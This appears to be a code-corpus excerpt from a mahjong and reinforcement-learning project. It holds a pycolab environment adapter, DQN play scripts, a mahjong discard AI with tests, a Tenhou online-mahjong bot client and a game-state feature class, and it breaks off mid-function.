# Save important constructor arguments.
self._game_factory = game_factory
self._default_reward = default_reward
self._observation_distiller = observation_distiller
self._max_iterations = max_iterations
# These slots comprise an Environment's internal state. They are:
self._state = None # Current Environment game step state.
self._current_game = None # Current pycolab game instance.
self._game_over = None # Whether the instance's game has ended.
self._last_observations = None # Last observation received from the game.
self._last_reward = None # Last reward, if any, or default reward.
self._last_discount = None # Last discount factor from the game.
# Attempt to distill our action spec.
self._valid_actions, self._action_size = self._compute_action_spec(
discrete_actions, continuous_actions)
# With this, we're ready to compute our own observation spec. This is done
# by starting a new episode, inspecting the observations returned in the
# first step, then closing the episode and resetting internal variables
# to a default value.
self._observation_spec = self._compute_observation_spec()
def reset(self):
"""Start a new episode."""
# Build a new game and retrieve its first set of state/reward/discount.
self._current_game = self._game_factory()
self._state = environment.StepType.FIRST
# Collect environment returns from starting the game and update state.
observations, reward, discount = self._current_game.its_showtime()
self._update_for_game_step(observations, reward, discount)
return environment.TimeStep(
step_type=self._state,
reward=None,
discount=None,
observation=self.last_observations)
def step(self, action):
"""Apply action, step the world forward, and return observations."""
if self._action_size == 1:
# Handle a float or single-element arrays of any dimensionality. Strictly
# speaking, a single-element list will also work, but it's best not to
# confuse matters in the docstring with this option.
all_actions = [np.asarray(action).item()]
else:
all_actions = [np.asarray(a).item() for a in action]
if len(all_actions) != self._action_size:
raise RuntimeError("A pycolab Environment adapter's step method "
'was called with actions that were not compatible '
'with what the pycolab game expects.')
# Clear episode internals and start a new episode, if episode ended or if
# the game was not already underway.
if self._state == environment.StepType.LAST:
self._drop_last_episode()
if self._current_game is None:
return self.reset()
# Execute the action in pycolab.
action = all_actions[0] if self._action_size == 1 else all_actions
observations, reward, discount = self._current_game.play(action)
self._update_for_game_step(observations, reward, discount)
# Check the current status of the game.
if self._game_over:
self._state = environment.StepType.LAST
else:
self._state = environment.StepType.MID
return environment.TimeStep(
step_type=self._state,
reward=self._last_reward,
discount=self._last_discount,
observation=self.last_observations)
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._valid_actions
@property
def last_observations(self):
"""Distill and return the last observation."""
# A "bare" numpy array will be placed in a dict under the key "board".
if isinstance(self._last_observations, dict):
observation = self._last_observations
else:
observation = {'board': self._last_observations}
return observation
### Various helpers. ###
def _compute_action_spec(self, discrete_actions, continuous_actions):
"""Helper for `__init__`: compute our environment's action spec."""
valid_actions = []
# First discrete actions:
if discrete_actions is not None:
try:
# Get an array of upper and lower bounds for each discrete action.
min_, max_ = zip(*discrete_actions)
# Total number of discrete actions provided on each time step.
shape = (len(discrete_actions),)
except TypeError:
min_, max_ = discrete_actions # Enforces 2-tuple.
shape = (1,)
spec = specs.BoundedArraySpec(shape=shape,
dtype='int32',
minimum=min_,
maximum=max_,
name='discrete')
valid_actions.append(spec)
# Then continuous actions:
if continuous_actions is not None:
try:
# Get an array of upper and lower bounds for each continuous action.
min_, max_ = zip(*continuous_actions)
# Total number of continuous actions provided on each time step.
shape = (len(continuous_actions),)
except TypeError:
min_, max_ = continuous_actions # Enforces 2-tuple
shape = (1,)
spec = specs.BoundedArraySpec(shape=shape,
dtype='float32',
minimum=min_,
maximum=max_,
name='continuous')
valid_actions.append(spec)
# And in total we have this many actions.
action_size = sum(value.shape[0] for value in valid_actions)
if action_size <= 0:
raise ValueError('A pycolab Environment adapter was initialised '
'without any discrete or continuous actions specified.')
# Use arrays directly if we only have one.
if len(valid_actions) == 1:
valid_actions = valid_actions[0]
return valid_actions, action_size
def _compute_observation_spec(self):
"""Helper for `__init__`: compute our environment's observation spec."""
# Start an environment, examine the values it gives to us, and reset things
# back to default.
timestep = self.reset()
observation_spec = {k: specs.ArraySpec(v.shape, v.dtype, name=k)
for k, v in timestep.observation.iteritems()}
# As long as we've got environment result data, we try checking to make sure
# that the reward types can be added together---a very weak way of measuring
# whether they are compatible.
if timestep.reward is not None:
try:
_ = timestep.reward + self._default_reward
except TypeError:
raise TypeError(
'A pycolab game wrapped by an Environment adapter returned '
'a first reward whose type is incompatible with the default reward '
"given to the adapter's `__init__`.")
self._drop_last_episode()
return observation_spec
def _update_for_game_step(self, observations, reward, discount):
"""Update internal state with data from an environment interaction."""
# Save interaction data in slots for self.observations() et al.
self._last_observations = self._observation_distiller(observations)
self._last_reward = reward if reward is not None else self._default_reward
self._last_discount = discount
self._game_over = self._current_game.game_over
# If we've reached the maximum number of game iterations, terminate the
# current game.
if self._current_game.the_plot.frame >= self._max_iterations:
self._game_over = True
def _drop_last_episode(self):
"""Clear all the internal information about the game."""
self._state = None
self._current_game = None
self._game_over = None
self._last_observations = None
self._last_reward = None
self._last_discount = None
class Distiller(object):
"""A convenience class for `observation_distiller` parameters.
An "observation distiller" is any function from the `rendering.Observation`s
generated by a pycolab game to a numpy array or a dict mapping string
keys to numpy arrays. While any callable performing this transformation is
usable as the `observation_distiller` parameter to the `Environment`
constructor, happy users tend to have these callables be stateless.
This class is sugar for a common pattern, which is to distill `Observation`s
first by repainting the characters that make up the observations and then to
convert the resulting `Observation` into one or more numpy arrays for
tendering to TensorFlow. For the former, a
`rendering.ObservationCharacterRepainter` will probably meet your needs; for
the latter, consider `rendering.ObservationToArray` or
`rendering.ObservationToFeatureArray`.
Or don't; I'm a docstring, not a cop.
"""
def __init__(self, repainter, array_converter):
"""Construct a Distiller.
Args:
repainter: a callable that converts `rendering.Observation`s to different
`rendering.Observation`s, or None if no such conversion is required.
This facility is normally used to change the characters used to
depict certain game elements, and a
`rendering.ObservationCharacterRepainter` object is a convenient way
to accomplish this conversion.
array_converter: a callable that converts `rendering.Observation`s to
a numpy array or a dict mapping strings to numpy arrays.
"""
self._repainter = repainter
self._array_converter = array_converter
def __call__(self, observation):
if self._repainter: observation = self._repainter(observation)
return self._array_converter(observation)
``` |
{
"source": "0xsuu/Project-Mahjong",
"score": 2
} |
#### File: rl_algorithms/test/play_cartpole.py
```python
from dqn_cartpole import *
import gym
def main():
env = gym.make("CartPole-v0")
agent = DQNCartpole(env.action_space.n, mode=PLAY, load=True)
total_reward = 0
observation = env.reset()
for step in range(300):
env.render()
action = agent.make_action(observation)
observation, reward, done, _ = env.step(action)
total_reward += reward
if done:
break
env.close()
print("Total reward:", total_reward)
if __name__ == "__main__":
main()
```
#### File: rl_algorithms/test/play_gomoku.py
```python
from gomoku_test import *
class GomokuEnvUI(GomokuEnv):
def __init__(self, player_color, opponent, board_size, agent=None):
GomokuEnv.__init__(self, player_color, opponent, board_size)
self._agent = agent
def dqn_wrapper(self, curr_state, prev_state, prev_action):
return self._agent.make_action(curr_state.board.encode())
def _reset_opponent(self, board):
if self.opponent == "dqn":
self.opponent_policy = self.dqn_wrapper
else:
super()._reset_opponent(board)
def input_to_action(input_string):
input_string = input_string.capitalize()
x_coord = ord(input_string[0]) - ord("A")
y_coord = int(input_string[1]) - 1
return y_coord * 9 + x_coord
def main():
agent = DQNGomoku(GomokuEnv("black", "random", 9).action_space.n, mode=PLAY)
env = GomokuEnvUI("black", "dqn", 9, agent)
env.reset()
done = False
while not done:
env.render()
_, reward, done, _ = env.step(input_to_action(input(":")))
if done:
if reward > 0:
print("Player win!")
else:
print("Bot win!")
if __name__ == "__main__":
main()
```
#### File: supervised_learning/train_data/Data.py
```python
def asdata(obj, asdata):
if isinstance(obj, Data):
return obj.asdata(asdata)
elif isinstance(obj, str):
return obj
elif hasattr(obj, '_asdict'):
return asdata(obj._asdict(), asdata)
elif isinstance(obj, dict):
return dict((k, asdata(v, asdata)) for (k, v) in obj.items())
else:
try:
return list(asdata(child, asdata) for child in obj)
except:
return obj
class Data:
def asdata(self, asdata = asdata):
return dict((k, asdata(v, asdata)) for (k, v) in self.__dict__.items())
def __repr__(self):
return self.asdata().__repr__()
```
#### File: mahjong/ai/main.py
```python
from mahjong.ai.agari import Agari
from mahjong.ai.base import BaseAI
from mahjong.ai.defence import Defence
from mahjong.ai.shanten import Shanten
from mahjong.tile import TilesConverter
class MainAI(BaseAI):
version = '0.0.6'
agari = None
shanten = None
defence = None
def __init__(self, table, player):
super(MainAI, self).__init__(table, player)
self.agari = Agari()
self.shanten = Shanten()
self.defence = Defence(table)
def discard_tile(self):
results, shanten = self.calculate_outs()
if shanten == 0:
self.player.in_tempai = True
# we are win!
if shanten == Shanten.AGARI_STATE:
return Shanten.AGARI_STATE
# Disable defence for now
# if self.defence.go_to_defence_mode():
# self.player.in_tempai = False
# tile_in_hand = self.defence.calculate_safe_tile_against_riichi()
# if we wasn't able to find a safe tile, let's discard a random one
# if not tile_in_hand:
# tile_in_hand = self.player.tiles[random.randrange(len(self.player.tiles) - 1)]
# else:
# tile34 = results[0]['discard']
# tile_in_hand = TilesConverter.find_34_tile_in_136_array(tile34, self.player.tiles)
tile34 = results[0]['discard']
tile_in_hand = TilesConverter.find_34_tile_in_136_array(tile34, self.player.tiles)
return tile_in_hand
def calculate_outs(self):
tiles = TilesConverter.to_34_array(self.player.tiles)
shanten = self.shanten.calculate_shanten(tiles)
# win
if shanten == Shanten.AGARI_STATE:
return [], shanten
raw_data = {}
for i in range(0, 34):
if not tiles[i]:
continue
tiles[i] -= 1
raw_data[i] = []
for j in range(0, 34):
if i == j or tiles[j] >= 4:
continue
tiles[j] += 1
if self.shanten.calculate_shanten(tiles) == shanten - 1:
raw_data[i].append(j)
tiles[j] -= 1
tiles[i] += 1
if raw_data[i]:
raw_data[i] = {'tile': i, 'tiles_count': self.count_tiles(raw_data[i], tiles), 'waiting': raw_data[i]}
results = []
tiles = TilesConverter.to_34_array(self.player.tiles)
for tile in range(0, len(tiles)):
if tile in raw_data and raw_data[tile] and raw_data[tile]['tiles_count']:
item = raw_data[tile]
waiting = []
for item2 in item['waiting']:
waiting.append(item2)
results.append({
'discard': item['tile'],
'waiting': waiting,
'tiles_count': item['tiles_count']
})
# if we have character and honor candidates to discard with same tiles count,
# we need to discard honor tile first
results = sorted(results, key=lambda x: (x['tiles_count'], x['discard']), reverse=True)
return results, shanten
def count_tiles(self, raw_data, tiles):
n = 0
for i in range(0, len(raw_data)):
n += 4 - tiles[raw_data[i]]
return n
```
#### File: ai/tests/tests_defence.py
```python
import unittest
from mahjong.ai.defence import Defence
from mahjong.table import Table
class DefenceTestCase(unittest.TestCase):
def test_go_to_the_defence_mode(self):
table = Table()
defence = Defence(table)
self.assertFalse(defence.go_to_defence_mode())
table.players[1].in_riichi = True
self.assertTrue(defence.go_to_defence_mode())
table.players[0].in_riichi = True
self.assertFalse(defence.go_to_defence_mode())
def test_calculate_safe_tiles_to_discard(self):
table = Table()
table.get_main_player().init_hand([3, 5, 6, 7, 8])
defence = Defence(table)
table.players[1].in_riichi = True
table.players[1].add_discarded_tile(2)
tile = defence.calculate_safe_tile_against_riichi()
# 0, 1, 2, 3 - is a same tile
self.assertEqual(tile, 3)
```
#### File: tenhou-bot/mahjong/client.py
```python
from mahjong.stat import Statistics
from mahjong.table import Table
from utils.general import make_random_letters_and_digit_string
class Client(object):
statistics = None
id = ''
position = 0
def __init__(self, use_previous_ai_version=False):
self.table = Table(use_previous_ai_version)
self.statistics = Statistics()
self.player = self.table.get_main_player()
self.id = make_random_letters_and_digit_string()
def authenticate(self):
pass
def start_game(self):
pass
def end_game(self):
pass
def init_hand(self, tiles):
self.player.init_hand(tiles)
def draw_tile(self, tile):
self.table.count_of_remaining_tiles -= 1
self.player.draw_tile(tile)
def discard_tile(self):
return self.player.discard_tile()
def call_meld(self, meld):
# when opponent called meld it is means
# that he will not get the tile from the wall
# so, we need to compensate "-" from enemy discard method
self.table.count_of_remaining_tiles += 1
return self.table.get_player(meld.who).add_meld(meld)
def enemy_discard(self, player_seat, tile):
self.table.get_player(player_seat).add_discarded_tile(tile)
self.table.count_of_remaining_tiles -= 1
for player in self.table.players:
if player.in_riichi:
player.safe_tiles.append(tile)
def enemy_riichi(self, player_seat):
self.table.get_player(player_seat).in_riichi = True
```
#### File: tenhou-bot/mahjong/tile.py
```python
class Tile(int):
TILES = '''
1s 2s 3s 4s 5s 6s 7s 8s 9s
1p 2p 3p 4p 5p 6p 7p 8p 9p
1m 2m 3m 4m 5m 6m 7m 8m 9m
ew sw ww nw
wd gd rd
'''.split()
def as_data(self):
return self.TILES[self // 4]
class TilesConverter(object):
@staticmethod
def to_one_line_string(tiles):
"""
Convert 136 tiles array to the one line string
Example of output 123s123p123m33z
"""
tiles = sorted(tiles)
man = [t for t in tiles if t < 36]
pin = [t for t in tiles if 36 <= t < 72]
pin = [t - 36 for t in pin]
sou = [t for t in tiles if 72 <= t < 108]
sou = [t - 72 for t in sou]
honors = [t for t in tiles if t >= 108]
honors = [t - 108 for t in honors]
sou = sou and ''.join([str((i // 4) + 1) for i in sou]) + 's' or ''
pin = pin and ''.join([str((i // 4) + 1) for i in pin]) + 'p' or ''
man = man and ''.join([str((i // 4) + 1) for i in man]) + 'm' or ''
honors = honors and ''.join([str((i // 4) + 1) for i in honors]) + 'z' or ''
return man + pin + sou + honors
@staticmethod
def to_34_array(tiles):
"""
Convert 136 array to the 34 tiles array
"""
results = [0] * 34
for tile in tiles:
tile //= 4
results[tile] += 1
return results
@staticmethod
def string_to_136_array(sou=None, pin=None, man=None, honors=None):
"""
Method to convert one line string tiles format to the 136 array
We need it to increase readability of our tests
"""
def _split_string(string, offset):
data = []
if not string:
return []
for i in string:
tile = offset + (int(i) - 1) * 4
data.append(tile)
return data
results = _split_string(man, 0)
results += _split_string(pin, 36)
results += _split_string(sou, 72)
results += _split_string(honors, 108)
return results
@staticmethod
def string_to_34_array(sou=None, pin=None, man=None, honors=None):
"""
Method to convert one line string tiles format to the 34 array
We need it to increase readability of our tests
"""
results = TilesConverter.string_to_136_array(sou, pin, man, honors)
results = TilesConverter.to_34_array(results)
return results
@staticmethod
def find_34_tile_in_136_array(tile34, tiles):
"""
Our shanten calculator will operate with 34 tiles format,
after calculations we need to find calculated 34 tile
in player's 136 tiles.
For example we had 0 tile from 34 array
in 136 array it can be present as 0, 1, 2, 3
"""
if tile34 > 33:
return None
tile = tile34 * 4
possible_tiles = [tile] + [tile + i for i in range(1, 4)]
found_tile = None
for possible_tile in possible_tiles:
if possible_tile in tiles:
found_tile = possible_tile
break
return found_tile
```
#### File: tenhou-bot/tenhou/client.py
```python
import datetime
import logging
import socket
from threading import Thread
from time import sleep
from urllib.parse import quote
import re
from mahjong.constants import DISPLAY_WINDS
from utils.settings_handler import settings
from mahjong.client import Client
from mahjong.meld import Meld
from mahjong.table import Table
from mahjong.tile import TilesConverter
from tenhou.decoder import TenhouDecoder
logger = logging.getLogger('tenhou')
class TenhouClient(Client):
socket = None
game_is_continue = True
looking_for_game = True
keep_alive_thread = None
decoder = TenhouDecoder()
def __init__(self):
super(TenhouClient, self).__init__(Table(False))
def setSocketObject(self, socket_object):
self.socket = socket_object
def authenticate(self):
self._send_message('<HELO name="{0}" tid="f0" sx="M" />'.format(quote(settings.USER_ID)))
auth_message = self._read_message()
auth_string = self.decoder.parse_auth_string(auth_message)
if not auth_string:
return False
auth_token = self.decoder.generate_auth_token(auth_string)
self._send_message('<AUTH val="{0}"/>'.format(auth_token))
self._send_message(self._pxr_tag())
# sometimes tenhou send an empty tag after authentication (in tournament mode)
# and bot thinks that he was not auth
# to prevent it lets wait a little
# and read a group of tags
sleep(3)
authenticated = False
messages = self._get_multiple_messages()
for message in messages:
if '<ln' in message:
authenticated = True
if authenticated:
self._send_keep_alive_ping()
logger.info('Successfully authenticated')
return True
else:
logger.info('Failed to authenticate')
return False
def start_game(self):
log_link = ''
if settings.LOBBY != '0':
if settings.IS_TOURNAMENT:
logger.info('Go to the tournament lobby: {0}'.format(settings.LOBBY))
self._send_message('<CS lobby="{0}" />'.format(settings.LOBBY))
sleep(2)
self._send_message('<DATE />')
else:
logger.info('Go to the lobby: {0}'.format(settings.LOBBY))
self._send_message('<CHAT text="{0}" />'.format(quote('/lobby {0}'.format(settings.LOBBY))))
sleep(2)
game_type = '{0},{1}'.format(settings.LOBBY, settings.GAME_TYPE)
if not settings.IS_TOURNAMENT:
self._send_message('<JOIN t="{0}" />'.format(game_type))
logger.info('Looking for the game...')
start_time = datetime.datetime.now()
while self.looking_for_game:
sleep(1)
messages = self._get_multiple_messages()
for message in messages:
if '<rejoin' in message:
# game wasn't found, continue to wait
self._send_message('<JOIN t="{0},r" />'.format(game_type))
if '<go' in message:
self._send_message('<GOK />')
self._send_message('<NEXTREADY />')
if '<taikyoku' in message:
self.looking_for_game = False
game_id, seat = self.decoder.parse_log_link(message)
log_link = 'http://tenhou.net/0/?log={0}&tw={1}'.format(game_id, seat)
self.statistics.game_id = game_id
if '<un' in message:
values = self.decoder.parse_names_and_ranks(message)
self.table.set_players_names_and_ranks(values)
if '<ln' in message:
self._send_message(self._pxr_tag())
current_time = datetime.datetime.now()
time_difference = current_time - start_time
if time_difference.seconds > 60 * settings.WAITING_GAME_TIMEOUT_MINUTES:
break
# we wasn't able to find the game in timeout minutes
# sometimes it happens and we need to end process
# and try again later
if self.looking_for_game:
logger.error('Game is not started. Can\'t find the game')
self.end_game()
return
logger.info('Game started')
logger.info('Log: {0}'.format(log_link))
logger.info('Players: {0}'.format(self.table.players))
main_player = self.table.get_main_player()
while self.game_is_continue:
sleep(1)
messages = self._get_multiple_messages()
for message in messages:
if '<init' in message:
values = self.decoder.parse_initial_values(message)
self.table.init_round(
values['round_number'],
values['count_of_honba_sticks'],
values['count_of_riichi_sticks'],
values['dora_indicator'],
values['dealer'],
values['scores'],
)
tiles = self.decoder.parse_initial_hand(message)
self.table.init_main_player_hand(tiles)
logger.info(self.table.__str__())
logger.info('Players: {}'.format(self.table.get_players_sorted_by_scores()))
logger.info('Dealer: {}'.format(self.table.get_player(values['dealer'])))
logger.info('Round wind: {}'.format(DISPLAY_WINDS[self.table.round_wind]))
logger.info('Player wind: {}'.format(DISPLAY_WINDS[main_player.player_wind]))
# draw and discard
if '<t' in message:
tile = self.decoder.parse_tile(message)
if not main_player.in_riichi:
self.draw_tile(tile)
sleep(1)
logger.info('Hand: {0}'.format(TilesConverter.to_one_line_string(main_player.tiles)))
tile = self.discard_tile()
if 't="16"' in message:
# we win by self draw (tsumo)
self._send_message('<N type="7" />')
else:
# let's call riichi and after this discard tile
if main_player.can_call_riichi():
self._send_message('<REACH hai="{0}" />'.format(tile))
sleep(2)
main_player.in_riichi = True
# tenhou format: <D p="133" />
self._send_message('<D p="{0}"/>'.format(tile))
logger.info('Remaining tiles: {0}'.format(self.table.count_of_remaining_tiles))
# new dora indicator after kan
if '<dora' in message:
tile = self.decoder.parse_dora_indicator(message)
self.table.add_dora_indicator(tile)
logger.info('New dora indicator: {0}'.format(tile))
if '<reach' in message and 'step="2"' in message:
who_called_riichi = self.decoder.parse_who_called_riichi(message)
self.enemy_riichi(who_called_riichi)
logger.info('Riichi called by {0} player'.format(who_called_riichi))
# the end of round
if 'agari' in message or 'ryuukyoku' in message:
sleep(2)
self._send_message('<NEXTREADY />')
# t="7" - suggest to open kan
open_sets = ['t="1"', 't="2"', 't="3"', 't="4"', 't="5"', 't="7"']
if any(i in message for i in open_sets):
sleep(1)
self._send_message('<N />')
# set call
if '<n who=' in message:
meld = self.decoder.parse_meld(message)
self.call_meld(meld)
logger.info('Meld: {0}, who {1}'.format(meld.type, meld.who))
# other player upgraded pon to kan, and it is our winning tile
if meld.type == Meld.CHAKAN and 't="8"' in message:
# actually I don't know what exactly client response should be
# let's try usual ron response
self._send_message('<N type="6" />')
# other players discards: <e, <f, <g + tile number
match_discard = re.match(r"^<[efg]+\d.*", message)
if match_discard:
# we win by other player's discard
if 't="8"' in message:
self._send_message('<N type="6" />')
tile = self.decoder.parse_tile(message)
if '<e' in message:
player_seat = 1
elif '<f' in message:
player_seat = 2
else:
player_seat = 3
self.enemy_discard(player_seat, tile)
if 'owari' in message:
values = self.decoder.parse_final_scores_and_uma(message)
self.table.set_players_scores(values['scores'], values['uma'])
if '<prof' in message:
self.game_is_continue = False
logger.info('Final results: {0}'.format(self.table.get_players_sorted_by_scores()))
# we need to finish the game, and only after this try to send statistics
# if order will be different, tenhou will return 404 on log download endpoint
self.end_game()
# sometimes log is not available just after the game
# let's wait one minute before the statistics update
if settings.STAT_SERVER_URL:
sleep(60)
result = self.statistics.send_statistics()
logger.info('Statistics sent: {0}'.format(result))
def end_game(self):
self.game_is_continue = False
self._send_message('<BYE />')
if self.keep_alive_thread:
self.keep_alive_thread.join()
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
logger.info('End of the game')
def _send_message(self, message):
# tenhou required the empty byte in the end of each sending message
logger.debug('Send: {0}'.format(message))
message += '\0'
self.socket.sendall(message.encode())
def _read_message(self):
message = self.socket.recv(1024)
logger.debug('Get: {0}'.format(message.decode('utf-8').replace('\x00', ' ')))
message = message.decode('utf-8')
# sometimes tenhou send messages in lower case, sometime in upper case, let's unify the behaviour
message = message.lower()
return message
def _get_multiple_messages(self):
# tenhou can send multiple messages in one request
messages = self._read_message()
messages = messages.split('\x00')
# last message always is empty after split, so let's exclude it
messages = messages[0:-1]
return messages
def _send_keep_alive_ping(self):
def send_request():
while self.game_is_continue:
self._send_message('<Z />')
sleep(15)
self.keep_alive_thread = Thread(target=send_request)
self.keep_alive_thread.start()
def _pxr_tag(self):
# I have no idea why we need to send it, but better to do it
if settings.IS_TOURNAMENT:
return '<PXR V="-1" />'
if settings.USER_ID == 'NoName':
return '<PXR V="1" />'
else:
return '<PXR V="9" />'
```
#### File: python_app/tiny_mahjong/game_state.py
```python
import numpy as np
TILE_STACK_COUNT = 72
PLAYER_COUNT = 2
INITIAL_HAND_COUNT = 4
FULL_HAND_COUNT = INITIAL_HAND_COUNT + 1
FULL_DISCARD_COUNT = int((TILE_STACK_COUNT - PLAYER_COUNT * INITIAL_HAND_COUNT) / PLAYER_COUNT)
ADDITIONAL_FEATURES = 5
class GameState:
def __init__(self, other_player_ids, disclose_all):
self._player_hand = None
self._opponents_hands = None
self._player_discards = []
self._other_player_discards = {}
if other_player_ids is not None:
if len(other_player_ids) != 0:
self._other_player_ids = other_player_ids
for i in other_player_ids:
self._other_player_discards[i] = []
else:
raise ValueError("Empty number of player ids.")
self._disclose_all = disclose_all
def copy(self):
copy_object = GameState(None, self._disclose_all)
if self._player_hand is not None:
copy_object._player_hand = self._player_hand.copy()
if self._opponents_hands is not None:
copy_object._opponents_hands = self._opponents_hands.copy()
copy_object._player_discards = self._player_discards.copy()
copy_object._other_player_ids = self._other_player_ids.copy()
for player_id in copy_object._other_player_ids:
copy_object._other_player_discards[player_id] = self._other_player_discards[player_id].copy()
return copy_object
def calc_expectation_one_lookahead(self, model, action):
expectation = 0.0
for i in range(1, 18 + 1):
new_state = self.copy()
new_state._player_hand[action] = i
new_state._player_hand = np.sort(new_state._player_hand)
new_state._player_discards.append(i)
transition_probability = new_state.calc_tile_distribution(new_state.calc_tile_count()[1:])[i - 1]
if transition_probability == 0:
continue
state_value = np.max(model.predict_q_values(new_state))
expectation += new_state.calc_tile_distribution(new_state.calc_tile_count()[1:])[i - 1] * state_value
return expectation
# Player's hand update.
def on_player_default_hand_obtained(self, hand):
hand = np.append(hand, 0)
assert hand.shape[0] == 5
self._player_hand = hand
def on_player_pick_new_tile(self, hand):
self._player_hand = hand
# Opponents' hands update (for disclose option).
def on_other_players_hands_obtained(self, hands):
self._opponents_hands = hands
# Players' discards update.
def on_player_discard(self, tile, new_hand):
self._player_discards.append(tile)
self._player_hand = new_hand
def on_other_player_discard(self, player_id, tile, new_hand):
self._other_player_discards[player_id].append(tile)
self._opponents_hands = new_hand
# Accessors.
def get(self):
""" Get the vector of the whole state information. """
# Append player's hand.
result = np.array(self._player_hand)
# Append shanten number and tenpai count if in tenpai state.
result = np.append(result, np.array(self.calc_shanten_tenpai_tiles(self._player_hand)[:2]))
# Append count for tiles left in tile stack.
result = np.append(result, np.array([np.sum(self.calc_tile_count()[1:]) - FULL_HAND_COUNT]))
# Append major suit's tile count.
result = np.append(result, np.array([self.calc_major_suit_count()]))
# Append 2-8 tile count.
result = np.append(result, np.array([self.calc_two_to_eight_count()]))
# Append tile stack counts.
# tile_count = self.calc_tile_count()[1:]
# tile_not_appeared = np.argwhere(tile_count == 4)
# result = np.append(result, tile_not_appeared)
# result = np.append(result, np.array([0] * (18 - tile_not_appeared.shape[0])))
# Append player's discards.
result = np.append(result, self._player_discards)
# Fill up 0s for non-full games. i.e. use fixed size input, thus the maximum number of discards are used.
result = np.append(result, np.zeros((FULL_DISCARD_COUNT - len(self._player_discards),)))
# If the disclose option is enabled, append opponents' hands.
if self._disclose_all:
result = np.append(result, self._opponents_hands.copy)
# Append opponents' discards and fill up with 0s.
for p in self._other_player_discards:
result = np.append(result, self._other_player_discards[p])
result = np.append(result, np.zeros((FULL_DISCARD_COUNT - len(self._other_player_discards[p]),)))
# Check state size.
other_players_count = len(self._other_player_ids)
assert result.shape[0] == (other_players_count + 1) * FULL_DISCARD_COUNT + FULL_HAND_COUNT + \
self._disclose_all * other_players_count * 5 + ADDITIONAL_FEATURES
return result
def get_player_hand(self):
return self._player_hand
def get_opponents_hands(self):
return self._opponents_hands
def get_opponents_discards(self):
return self._other_player_discards
def calc_shanten_tenpai_tiles(self, hand):
"""
:return: Shanten, Tenpai count, Tenpai tiles(only applies to four tiles hand).
"""
tile_count = self.calc_tile_count(disclose=self._disclose_all)
player_hand = hand.copy()
if 0 in player_hand:
player_hand = np.delete(player_hand, np.argwhere(player_hand == 0))
# Try remove the combo first.
found_combo = False
sum_tenpai = 0
sum_tenpai_tiles = []
for i in range(player_hand.shape[0] - 2):
# Avoid duplicate initial tile.
if i > 0 and player_hand[i] == player_hand[i - 1]:
continue
if player_hand[i] == player_hand[i + 1] and player_hand[i + 1] == player_hand[i + 2]:
removed_trio_hand = player_hand.copy()
removed_trio_hand = np.delete(removed_trio_hand, i + 2)
removed_trio_hand = np.delete(removed_trio_hand, i + 1)
removed_trio_hand = np.delete(removed_trio_hand, i)
# If a trio is removed, we can derive the shanten directly.
if removed_trio_hand.shape[0] == 1:
return 1, tile_count[int(removed_trio_hand[0])], [int(removed_trio_hand[0])]
if removed_trio_hand.shape[0] == 2:
if removed_trio_hand[0] == removed_trio_hand[1]:
return 0, np.sum(tile_count[1:]), []
else:
tenpai_count = max(tile_count[int(removed_trio_hand[0])], tile_count[int(removed_trio_hand[1])])
return 1, tenpai_count, []
for j in range(i + 1, player_hand.shape[0] - 1):
if player_hand[i] <= 9 < player_hand[j] or player_hand[i] > 9 >= player_hand[j]:
# Break the loop if the suit does not match.
break
if player_hand[i] == player_hand[j] - 1:
for k in range(j + 1, player_hand.shape[0]):
if player_hand[j] <= 9 < player_hand[k] or \
player_hand[j] > 9 >= player_hand[k]:
# Break the loop if the suit does not match.
break
if player_hand[j] == player_hand[k] - 1:
removed_straight_hand = player_hand.copy()
removed_straight_hand = np.delete(removed_straight_hand, k)
removed_straight_hand = np.delete(removed_straight_hand, j)
removed_straight_hand = np.delete(removed_straight_hand, i)
# If a trio is removed, we can find the minimum shanten.
if removed_straight_hand.shape[0] == 1:
if int(removed_straight_hand[0]) not in sum_tenpai_tiles:
sum_tenpai += tile_count[int(removed_straight_hand[0])]
sum_tenpai_tiles.append(int(removed_straight_hand[0]))
found_combo = True
if removed_straight_hand.shape[0] == 2:
if removed_straight_hand[0] == removed_straight_hand[1]:
return 0, np.sum(tile_count[1:]), []
else:
sum_tenpai += \
max(tile_count[int(removed_straight_hand[0])],
tile_count[int(removed_straight_hand[1])])
found_combo = True
found_one_potential_combo = False
found_two_potential_combo = False
max_return_tenpai = -1
max_tenpai_tiles = []
for i in range(player_hand.shape[0] - 1):
# Avoid duplicate initial tile.
if i > 0 and player_hand[i] == player_hand[i - 1]:
continue
tile_i = player_hand[i]
for j in range(i + 1, player_hand.shape[0]):
tile_j = player_hand[j]
if tile_i <= 9 < tile_j or tile_i > 9 >= tile_j:
# Break the loop if the suit does not match.
break
if tile_i == tile_j + 1 or tile_i == tile_j - 1 or \
tile_i == tile_j + 2 or tile_i == tile_j - 2 or tile_i == tile_j:
found_one_potential_combo = True
remove_one_hand = player_hand.copy()
remove_one_hand = np.delete(remove_one_hand, j)
remove_one_hand = np.delete(remove_one_hand, i)
for i2 in range(remove_one_hand.shape[0] - 1):
for j2 in range(i2 + 1, remove_one_hand.shape[0]):
if remove_one_hand[i2] == remove_one_hand[j2]:
found_two_potential_combo = True
return_tenpai = None
tenpai_tiles = None
if tile_i == tile_j + 2:
return_tenpai = tile_count[int(tile_i) - 1]
tenpai_tiles = [int(tile_i) - 1]
elif tile_i == tile_j - 2:
return_tenpai = tile_count[int(tile_i) + 1]
tenpai_tiles = [int(tile_i) + 1]
elif tile_i == tile_j + 1:
return_tenpai = 0
tenpai_tiles = []
if tile_i != 1 and tile_i != 9 and tile_i != 10 and tile_i != 18:
return_tenpai += tile_count[int(tile_i) + 1]
tenpai_tiles.append(int(tile_i) + 1)
if tile_j != 1 and tile_j != 9 and tile_j != 10 and tile_j != 18:
return_tenpai += tile_count[int(tile_j) - 1]
tenpai_tiles.append(int(tile_j) - 1)
elif tile_i == tile_j - 1:
return_tenpai = 0
tenpai_tiles = []
if tile_j != 1 and tile_j != 9 and tile_j != 10 and tile_j != 18:
return_tenpai += tile_count[int(tile_j) + 1]
tenpai_tiles.append(int(tile_j) + 1)
if tile_i != 1 and tile_i != 9 and tile_i != 10 and tile_i != 18:
return_tenpai += tile_count[int(tile_i) - 1]
tenpai_tiles.append(int(tile_i) - 1)
elif tile_i == tile_j:
return_tenpai = tile_count[int(tile_i)] + tile_count[int(remove_one_hand[i2])]
tenpai_tiles = [int(tile_i), int(remove_one_hand[i2])]
if return_tenpai > max_return_tenpai:
max_return_tenpai = return_tenpai
if player_hand.shape[0] == 4:
